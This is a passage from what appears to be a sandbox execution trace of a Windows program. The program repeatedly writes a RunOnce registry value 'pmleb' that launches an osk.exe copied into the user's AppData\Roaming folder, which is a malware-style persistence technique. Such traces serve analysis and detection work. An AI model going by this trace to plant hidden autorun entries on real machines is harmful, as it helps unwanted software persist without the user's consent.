phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.440] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.440] RegCloseKey (hKey=0x280) returned 0x0 [0110.440] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.440] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.440] SetTimer (hWnd=0x20280, nIDEvent=0x2476, uElapse=0xa, lpTimerFunc=0x0) returned 0x2476 [0110.441] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.453] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.453] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.454] KillTimer (hWnd=0x20280, uIDEvent=0x2476) returned 1 [0110.454] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.454] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.454] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.455] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.455] RegCloseKey (hKey=0x280) returned 0x0 [0110.455] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.455] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.455] SetTimer (hWnd=0x20280, nIDEvent=0x2477, uElapse=0xa, lpTimerFunc=0x0) returned 0x2477 [0110.455] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.469] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.469] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.469] KillTimer (hWnd=0x20280, uIDEvent=0x2477) returned 1 [0110.470] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.470] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.470] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.470] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.471] RegCloseKey (hKey=0x280) returned 0x0 [0110.471] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.471] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.471] SetTimer (hWnd=0x20280, nIDEvent=0x2478, uElapse=0xa, lpTimerFunc=0x0) returned 0x2478 [0110.471] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.485] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.485] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.485] KillTimer (hWnd=0x20280, uIDEvent=0x2478) returned 1 [0110.485] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.486] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.486] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.486] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.486] RegCloseKey (hKey=0x280) returned 0x0 [0110.486] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.486] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.486] SetTimer (hWnd=0x20280, nIDEvent=0x2479, uElapse=0xa, lpTimerFunc=0x0) returned 0x2479 [0110.487] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.500] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.500] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.501] KillTimer (hWnd=0x20280, uIDEvent=0x2479) returned 1 [0110.501] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.501] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.501] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.502] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.502] RegCloseKey (hKey=0x280) returned 0x0 [0110.502] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.502] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.502] SetTimer (hWnd=0x20280, nIDEvent=0x247a, uElapse=0xa, lpTimerFunc=0x0) returned 0x247a [0110.502] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.516] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.516] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.516] KillTimer (hWnd=0x20280, uIDEvent=0x247a) returned 1 [0110.517] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.517] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.517] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.517] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.517] RegCloseKey (hKey=0x280) returned 0x0 [0110.518] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.518] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.518] SetTimer (hWnd=0x20280, nIDEvent=0x247b, uElapse=0xa, lpTimerFunc=0x0) returned 0x247b [0110.518] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.532] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.532] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.532] KillTimer (hWnd=0x20280, uIDEvent=0x247b) returned 1 [0110.532] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.533] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.533] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.533] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.533] RegCloseKey (hKey=0x280) returned 0x0 [0110.533] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.533] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.534] SetTimer (hWnd=0x20280, nIDEvent=0x247c, uElapse=0xa, lpTimerFunc=0x0) returned 0x247c [0110.534] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.548] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.548] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.548] KillTimer (hWnd=0x20280, uIDEvent=0x247c) returned 1 [0110.548] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.549] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.549] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.549] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.549] RegCloseKey (hKey=0x280) returned 0x0 [0110.549] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.549] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.549] SetTimer (hWnd=0x20280, nIDEvent=0x247d, uElapse=0xa, lpTimerFunc=0x0) returned 0x247d [0110.550] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.936] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.936] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.937] KillTimer (hWnd=0x20280, uIDEvent=0x247d) returned 1 [0110.937] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.938] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.938] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.938] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.938] RegCloseKey (hKey=0x280) returned 0x0 [0110.938] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.938] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.938] SetTimer (hWnd=0x20280, nIDEvent=0x247e, uElapse=0xa, lpTimerFunc=0x0) returned 0x247e [0110.938] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.953] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.953] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.953] KillTimer (hWnd=0x20280, uIDEvent=0x247e) returned 1 [0110.953] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.954] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.954] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.954] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.954] RegCloseKey (hKey=0x280) returned 0x0 [0110.954] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.954] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.955] SetTimer (hWnd=0x20280, nIDEvent=0x247f, uElapse=0xa, lpTimerFunc=0x0) returned 0x247f [0110.955] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.968] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.968] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.968] KillTimer (hWnd=0x20280, uIDEvent=0x247f) returned 1 [0110.969] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.969] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.969] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.969] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.969] RegCloseKey (hKey=0x280) returned 0x0 [0110.970] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.970] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.970] SetTimer (hWnd=0x20280, nIDEvent=0x2480, uElapse=0xa, lpTimerFunc=0x0) returned 0x2480 [0110.970] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.984] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.984] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.984] KillTimer (hWnd=0x20280, uIDEvent=0x2480) returned 1 [0110.984] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.985] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.985] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.985] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.985] RegCloseKey (hKey=0x280) returned 0x0 [0110.985] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.985] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.985] SetTimer (hWnd=0x20280, nIDEvent=0x2481, uElapse=0xa, lpTimerFunc=0x0) returned 0x2481 [0110.985] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.999] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.999] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.000] KillTimer (hWnd=0x20280, uIDEvent=0x2481) returned 1 [0111.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.000] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.000] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.001] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.001] RegCloseKey (hKey=0x280) returned 0x0 [0111.001] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.001] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.001] SetTimer (hWnd=0x20280, nIDEvent=0x2482, uElapse=0xa, lpTimerFunc=0x0) returned 0x2482 [0111.001] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.015] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.015] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.015] KillTimer (hWnd=0x20280, uIDEvent=0x2482) returned 1 [0111.016] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.016] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.016] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.016] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.016] RegCloseKey (hKey=0x280) returned 0x0 [0111.016] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.017] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.017] SetTimer (hWnd=0x20280, nIDEvent=0x2483, uElapse=0xa, lpTimerFunc=0x0) returned 0x2483 [0111.017] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.031] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.031] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.031] KillTimer (hWnd=0x20280, uIDEvent=0x2483) returned 1 [0111.031] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.032] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.032] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.032] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.032] RegCloseKey (hKey=0x280) returned 0x0 [0111.032] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.033] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.033] SetTimer (hWnd=0x20280, nIDEvent=0x2484, uElapse=0xa, lpTimerFunc=0x0) returned 0x2484 [0111.033] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.047] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.047] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.047] KillTimer (hWnd=0x20280, uIDEvent=0x2484) returned 1 [0111.047] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.047] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.048] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.048] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.048] RegCloseKey (hKey=0x280) returned 0x0 [0111.048] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.048] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.048] SetTimer (hWnd=0x20280, nIDEvent=0x2485, uElapse=0xa, lpTimerFunc=0x0) returned 0x2485 [0111.048] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.063] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.063] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.063] KillTimer (hWnd=0x20280, uIDEvent=0x2485) returned 1 [0111.063] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.063] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.063] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.064] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.064] RegCloseKey (hKey=0x280) returned 0x0 [0111.064] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.064] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.064] SetTimer (hWnd=0x20280, nIDEvent=0x2486, uElapse=0xa, lpTimerFunc=0x0) returned 0x2486 [0111.064] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.077] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.077] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.078] KillTimer (hWnd=0x20280, uIDEvent=0x2486) returned 1 [0111.078] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.078] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.078] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.078] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.079] RegCloseKey (hKey=0x280) returned 0x0 [0111.079] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.079] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.079] SetTimer (hWnd=0x20280, nIDEvent=0x2487, uElapse=0xa, lpTimerFunc=0x0) returned 0x2487 [0111.079] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.093] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.093] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.093] KillTimer (hWnd=0x20280, uIDEvent=0x2487) returned 1 [0111.093] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.094] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.094] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.094] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.094] RegCloseKey (hKey=0x280) returned 0x0 [0111.094] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.094] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.094] SetTimer (hWnd=0x20280, nIDEvent=0x2488, uElapse=0xa, lpTimerFunc=0x0) returned 0x2488 [0111.094] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, 